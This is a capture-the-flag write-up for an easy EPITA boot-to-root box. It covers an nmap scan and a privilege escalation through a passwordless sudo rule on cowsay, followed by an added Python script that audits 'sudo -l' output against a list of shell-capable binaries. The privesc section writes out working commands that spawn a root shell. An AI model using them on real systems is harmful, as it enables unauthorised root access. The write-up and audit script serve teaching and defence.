# JI EPITA - CTF

#### Challenge Type : boot to root (box)

#### Difficulty : easy

----

## Writeup

### Enum

Scan the IP with nmap for open ports:

```
nmap -p- ip
```

Ports 22 and 31337 are open. We find that there is a web service on port 31337.

### Foothold

...

### Privesc

We can see that the user is allowed to run `/usr/games/cowsay` as root using sudo without a password.

```
User l33t may run the following commands on srv1prod:
    (ALL) NOPASSWD: /usr/games/cowsay, /usr/bin/sudo -l
```

Using GTFOBins, we identified that we can spawn a root shell thanks to this misconfiguration.

[https://gtfobins.github.io/gtfobins/cowsay/](https://gtfobins.github.io/gtfobins/cowsay/)

```
TF=$(mktemp)
echo 'exec "/bin/sh";' >$TF
sudo cowsay -f $TF x
# id
uid=0(root) gid=0(root) groups=0(root)
# cat /root/root.txt
epita{th3-sup3r-c0ws4y}
```

Solved!
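
From the defender's side, the sudo rule above is what an audit should catch. The following is an added example, not part of the original writeup: it parses `sudo -l` output and flags entries that grant a binary able to run arbitrary code. The `SHELL_CAPABLE` list and the `audit_sudo_l` name are assumptions, and the third sample rule is constructed.

```python
import re

# Assumption: a site-maintained list of binaries able to run arbitrary code.
# cowsay comes from this writeup; the other names are constructed samples.
SHELL_CAPABLE = {"cowsay", "vim", "less", "find", "awk", "perl"}

# The `sudo -l` output from the writeup, plus one constructed benign rule.
SAMPLE = """\
User l33t may run the following commands on srv1prod:
    (ALL) NOPASSWD: /usr/games/cowsay, /usr/bin/sudo -l
    (root) /usr/bin/systemctl status nginx
"""

RULE = re.compile(r"^\s*\(([^)]*)\)\s*(.*)$")   # "(runas) TAG: cmd, cmd"
TAG = re.compile(r"^([A-Z_]+):\s*")             # NOPASSWD:, SETENV:, ...


def audit_sudo_l(text, risky=SHELL_CAPABLE):
    """Return one finding per sudo rule entry that grants a risky binary."""
    findings = []
    for line in text.splitlines():
        rule = RULE.match(line)
        if not rule:
            continue  # header and "Matching Defaults entries" lines
        runas, nopasswd = rule.group(1).strip(), False
        # Commands are comma-separated; a literal comma is written "\,".
        for item in re.split(r"(?<!\\),", rule.group(2)):
            item = item.strip()
            # A tag applies to the command it precedes and to later ones.
            while (tag := TAG.match(item)):
                if tag.group(1) in ("NOPASSWD", "PASSWD"):
                    nopasswd = tag.group(1) == "NOPASSWD"
                item = item[tag.end():]
            if not item:
                continue
            binary = item.split()[0].rsplit("/", 1)[-1]
            if item == "ALL" or binary in risky:
                findings.append(
                    {"runas": runas, "command": item, "nopasswd": nopasswd}
                )
    return findings


if __name__ == "__main__":
    for f in audit_sudo_l(SAMPLE):
        print(f"REVIEW: {f['command']} as ({f['runas']}), NOPASSWD={f['nopasswd']}")
```

Run it over the output of `sudo -l -U <user>` for each account; any flagged entry is a rule to remove from sudoers or replace with a command that takes no user-controlled file argument.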